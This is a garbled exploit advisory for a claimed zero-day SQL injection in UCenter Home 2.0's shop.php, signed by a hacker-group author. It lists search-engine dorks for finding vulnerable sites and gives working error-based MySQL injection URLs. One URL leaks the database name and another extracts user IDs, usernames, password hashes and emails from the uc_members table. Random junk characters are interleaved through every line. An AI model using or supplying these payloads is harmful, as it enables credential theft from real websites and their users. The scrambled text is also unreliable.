9 S! w0 ]7 v8 k+ E- `$ s( j( [__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 5 H) o& x9 N3 a) u P) F: L
* a# E1 b9 G+ \
^8 {) C! P4 I+ o$ {5 e$ L6 b* j+ O. x: j" w! @- \7 q# C
*/ Author : KnocKout * _$ Z; _& v% F. o0 P
' ?6 t3 E" {5 }+ `2 e/ ?
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
- Q% A5 d. c. s- ?
H+ Y% P' d. a*/ Contact: knockoutr@msn.com 1 y5 c+ ?: }# r$ X
9 }$ Z% D; ^. D' U! \*/ Cyber-Warrior.org/CWKnocKout 6 z0 d2 | }8 W: F3 e
; S) l2 F; ?. D) v; h G% \1 w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , T& G/ k8 X: p0 p! {
' ?5 L! y; Q, r& L
Script : UCenter Home
. S; o3 q! \" k6 P" _) W& W
' B4 _, [7 D& z4 bVersion : 2.0 ; M5 T4 ~. w% U8 [" o
7 q) [4 k* N! y( _3 gScript HomePage : http://u.discuz.net/
( V/ Z# b- b" z3 o- r% E, _
, W `4 n: M! k& m1 ]7 X__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== . a& E* s2 r5 M
$ b0 |2 [/ p9 S/ x5 ^# z6 Y5 l4 l
Dork : Powered by UCenter inurl:shop.php?ac=view + x. K' E( J2 n7 [% ?2 F
6 m9 S; D8 \; n" E* P* jDork 2 : inurl:shop.php?ac=view&shopid=
* P& h+ Z- a9 x; t. E8 L7 u( o: s. U( g/ P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : C2 F/ g1 @# `& \) H: O
# N$ e% i" B- R. g: F# ~- \8 n& K
Vuln file : Shop.php
+ S0 J8 l1 f. R8 b l
+ m! U) G" ^; [( g% evalue's : (?)ac=view&shopid=
( Q3 M/ }5 _/ v$ i: h* c4 Q! A
% J: Y9 v# R# L; `Vulnerable Style : SQL Injection (MySQL Error Based) . X* D2 I- f0 n+ X+ M8 O; n
; F' Z7 E3 L+ R! BNeed Metarials : Hex Conversion
# }/ a. c z8 r) j6 a& c `- i H/ n
+ ^, O4 y- g: ~% h__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 G5 I, v- B0 [9 c" m6 V0 }% r; _" ~$ t3 m5 ~
Your Need victim Database name. 2 Q4 Y+ h" A3 p6 J. k1 }
/ x. p( D s; j7 z9 e
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
3 X2 L8 C: O) K3 Q' ^# X8 \5 e# Q& `3 Y3 Z+ i0 z9 m0 C4 u
..
1 B. X/ V9 @% f+ Q# ~
, m6 Y: K) s% ]9 \DB : Okey. % C' M( G! Z5 Y0 E; ?2 A, y
' M- ?0 E2 x x, P% U; ]your edit DB `[TARGET DB NAME]`
9 H" d8 V3 c/ u7 x- F: ]3 p1 Z% v1 B8 P
Example : 'hiwir1_ucenter'
" m9 [6 y5 p. m4 S, v6 B8 v- F, b5 W
Edit : Okey. * @ N8 W' n- z6 Z8 x5 |
% H4 s& d3 n; |, l/ [# H" w0 l7 J3 ~Your use Hex conversion. And edit Your SQL Injection Exploit.. : L+ V7 _2 P. G- b! q
- o7 E# p1 }0 M, ^
! S6 }$ p" ~0 d: T2 Z4 W$ O0 |) C" y5 G5 u# i& t, I7 E: E
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
! e4 c; P& ]7 |, L4 Z+ Z$ R |